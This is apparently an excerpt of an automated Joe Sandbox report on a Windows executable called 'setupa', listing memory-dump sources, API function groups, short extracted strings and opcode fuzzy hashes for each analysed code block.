                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: List$Interlocked$DepthEntryPushQuery$Flush
                                                                                                              • String ID:
                                                                                                              • API String ID: 358188281-0
                                                                                                              • Opcode ID: 9c4fe89fdfe404a64806ebc5534dea8e97b6eb1dc6672fcb6d214a2a4216e5c1
                                                                                                              • Instruction ID: aa43f89aceae6f5b548855803fda488b2d453571c287df59dfb8543c73971604
                                                                                                              • Opcode Fuzzy Hash: 9c4fe89fdfe404a64806ebc5534dea8e97b6eb1dc6672fcb6d214a2a4216e5c1
                                                                                                              • Instruction Fuzzy Hash: 88418C32608A45C6EB11DF21E5505BD37A0FF4AF8AB40003AEE5E93798DF38E985D780
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ExitThread$CloseFreeHandleLibrary
                                                                                                              • String ID:
                                                                                                              • API String ID: 2705336791-0
                                                                                                              • Opcode ID: 13ec1ad90aadc8c557f13098c17bc3fbde9c7d7a473fe7182bc2e3ea4c844adc
                                                                                                              • Instruction ID: 387418ccf742d4c58bbc228d1df4606dd115bfd8ee6c66ff44bf2ddb9a62195b
                                                                                                              • Opcode Fuzzy Hash: 13ec1ad90aadc8c557f13098c17bc3fbde9c7d7a473fe7182bc2e3ea4c844adc
                                                                                                              • Instruction Fuzzy Hash: CD010021A08686D2FB149F60A59417C22A4BF45FF6F14073DC22D826E5DF78E454C344
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Thread$CloseCreateErrorFreeHandleLastLibraryResume
                                                                                                              • String ID:
                                                                                                              • API String ID: 3954663864-0
                                                                                                              • Opcode ID: 05c939b51d5535321289230bed4abcce831a3e8461ac90e5580470fde0f9a77a
                                                                                                              • Instruction ID: eedf5a2a1d65bc6e043482a7395d852722dbc678a4925ac2f94e992e3c84d0cf
                                                                                                              • Opcode Fuzzy Hash: 05c939b51d5535321289230bed4abcce831a3e8461ac90e5580470fde0f9a77a
                                                                                                              • Instruction Fuzzy Hash: 4B219D21A09702C6FE249F60A4652B962A0BF46FF6F05073DDA3E827D0EF3CE454C604
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                              • String ID: U
                                                                                                              • API String ID: 2456169464-4171548499
                                                                                                              • Opcode ID: 0a39034b221bca4d61d213e01ba932a6e51a446181c4a256a89e61f419f66193
                                                                                                              • Instruction ID: 41458793af8aaaace1c712b6c1a8bf7a56d9e521e5f0006600e657c2349d5b6a
                                                                                                              • Opcode Fuzzy Hash: 0a39034b221bca4d61d213e01ba932a6e51a446181c4a256a89e61f419f66193
                                                                                                              • Instruction Fuzzy Hash: BE41A222B19A41D2EB208F25E8443AA77A1FB88BD5F854039EE4E87788DF3CD441CB40
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: OpenProcess
                                                                                                              • String ID: Open$Proc$ess
                                                                                                              • API String ID: 3743895883-633399097
                                                                                                              • Opcode ID: fd97c17850388e9c3ff76e8b3c1c27f857b0c40d4cce75d02240dd44613da4fc
                                                                                                              • Instruction ID: 69d6317c55443016b35751f1b3aaab0b916f3676b647b1f17ac4f2d1b8509a9c
                                                                                                              • Opcode Fuzzy Hash: fd97c17850388e9c3ff76e8b3c1c27f857b0c40d4cce75d02240dd44613da4fc
                                                                                                              • Instruction Fuzzy Hash: B2119E32B1575086F710CF62A8141A967A5BB88FE4F484039EE0D57B49DF38D592CB40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 426b9eac409b7ff15a383615fc3b56e76daf99ba2d7e73c76012abf250fec1f5
                                                                                                              • Instruction ID: d468091d45381abec41ea88108e77066453d1a8dfac25887af235cfab153a44a
                                                                                                              • Opcode Fuzzy Hash: 426b9eac409b7ff15a383615fc3b56e76daf99ba2d7e73c76012abf250fec1f5
                                                                                                              • Instruction Fuzzy Hash: BA819B22A18602C9FB319F7594916BD26A0BF44FDAFC4813DDD0E97A91DE3CE446E710
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                              • String ID:
                                                                                                              • API String ID: 1557788787-0
                                                                                                              • Opcode ID: 49825a6f98e9747c27f4630de9e174b13460c8f413418d393562f2b42130e6ac
                                                                                                              • Instruction ID: c854f8476262e008efcc82c63fcf1038cd271caa32a78962ad4a3d738549ed6a
                                                                                                              • Opcode Fuzzy Hash: 49825a6f98e9747c27f4630de9e174b13460c8f413418d393562f2b42130e6ac
                                                                                                              • Instruction Fuzzy Hash: 2D215031E18792C1E6248F52A440029A7A4FF99FD5B484139DF9EA3BA8DF3CE492C704
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DecodeExceptionPointerRaise
                                                                                                              • String ID: csm
                                                                                                              • API String ID: 2415446407-1018135373
                                                                                                              • Opcode ID: 6d150f7aa453deacd86b64b0c6899e2f2e0aa7e9f9aba382eb4e338adb66b9a5
                                                                                                              • Instruction ID: 631edccb4199486709249f527e2be70bb10056524c1ba6c03deabef6eeb1f644
                                                                                                              • Opcode Fuzzy Hash: 6d150f7aa453deacd86b64b0c6899e2f2e0aa7e9f9aba382eb4e338adb66b9a5
                                                                                                              • Instruction Fuzzy Hash: 13518C62A14BC6CAEB65CF38C9402EC3360FB58B98F549229DB5D43A56DF39E1E1C700
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Event
                                                                                                              • String ID: pScheduler$version
                                                                                                              • API String ID: 4201588131-3154422776
                                                                                                              • Opcode ID: 547f109356b54737c1ca3026f7509aa8098e79f1e24ba0fc8c150671691a0f5d
                                                                                                              • Instruction ID: fc8ce6765836cebc030bf6946f9e7c22f1b1e187945866416e07bc395f14d19e
                                                                                                              • Opcode Fuzzy Hash: 547f109356b54737c1ca3026f7509aa8098e79f1e24ba0fc8c150671691a0f5d
                                                                                                              • Instruction Fuzzy Hash: 4B31A231A08642D6FA20DF64E8900B823B0FF80B96F904239E65DC76E5DF2CE5D5DB40
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorFileLastModuleName
                                                                                                              • String ID: Main Invoked.
                                                                                                              • API String ID: 2776309574-1952101238
                                                                                                              • Opcode ID: 18040c3e2704eec9e4f278d6a6c374118b409a9e932da4cbf8eb26b9bac95459
                                                                                                              • Instruction ID: ebf1c7e1e2f1731cda3ca4b56f6118ff009f6edc4723f0300b6c8aa82c5a801b
                                                                                                              • Opcode Fuzzy Hash: 18040c3e2704eec9e4f278d6a6c374118b409a9e932da4cbf8eb26b9bac95459
                                                                                                              • Instruction Fuzzy Hash: A9316131A18B41C9FB60CF64E8943BA73A0FF94B95F500639DA9D866A4DF7CD184EB00
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorFileLastModuleName
                                                                                                              • String ID: Main Returned.
                                                                                                              • API String ID: 2776309574-1078862748
                                                                                                              • Opcode ID: b11b02404f553d2f4a96b1ca325f4689d7817d672c915bbfd91e390250e11729
                                                                                                              • Instruction ID: 3cb90bab3638e2a62da65f565d9c03280223eeb387edc9a07527058a2ccdeb84
                                                                                                              • Opcode Fuzzy Hash: b11b02404f553d2f4a96b1ca325f4689d7817d672c915bbfd91e390250e11729
                                                                                                              • Instruction Fuzzy Hash: 4A31B431A18B41C6F720CF64E8503BA73A0FF54B95F500639D69D866A4DF3CE184CB00
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InformationObject
                                                                                                              • String ID: bObj$ect
                                                                                                              • API String ID: 1757262956-2883911777
                                                                                                              • Opcode ID: 2ddc7d36761d22a246cd55f3ac640d2faa213e5d704b3fd3f325a16265622f19
                                                                                                              • Instruction ID: a6784b1500f9a51514c68d8848291f2b4b502ef6f93f590adbc494164cc4302d
                                                                                                              • Opcode Fuzzy Hash: 2ddc7d36761d22a246cd55f3ac640d2faa213e5d704b3fd3f325a16265622f19
                                                                                                              • Instruction Fuzzy Hash: 0E018432B04781D5F710CF62A8054A967A4BB9CFD4F144035EE4D67B09DF38D982CB40
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
Similarity
• API ID: AssignObjectProcess
• String ID: ject$obOb
• API String ID: 1819803957-1437108869
Memory Dump Source
• Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: msvcrt.dll
• API String ID: 1646373207-370904613
Memory Dump Source
• Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
Similarity
• API ID: CreateErrorLastThreadpoolWait
